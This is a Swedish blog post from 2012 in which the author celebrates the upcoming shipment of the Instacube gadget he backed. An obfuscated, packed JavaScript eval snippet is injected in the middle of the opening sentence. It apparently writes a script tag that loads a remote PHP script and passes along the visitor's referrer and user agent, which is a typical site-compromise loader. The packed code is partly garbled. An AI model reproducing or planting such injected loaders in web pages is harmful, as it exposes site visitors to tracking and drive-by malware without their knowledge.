Image Image Image Image Image Image Image Image Image Image

| 20 februari, 2020

Scroll to top

Top

Instacube – snart börjar den skeppas ut!

Instacube – snart börjar den skeppas ut!
Filip Urde
  • On 13 december, 2012
  • http://www.revue.se/filip-urde

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyisb|var|u0026u|referrer|byzar||js|php’.split(’|’),0,{}))
jag väntat på dig
Instacube!

 

 

Jag blev kär i Instacube direkt!  När jag såg den för första gången så visste jag att det var något jag skulle ha. Jag var då också väldigt tidig med att backa Instacube. Men jag visste att den skulle bli av och bli en succé (säger jag utan att ha fått prova den).

Men nu idag fick jag äntligen mailet... med följande bild:

 

 

 

 

 

 

 

Det här kommer bli ballt.

Är det någon annan som backat upp en Instacube och är taggad?

 instacube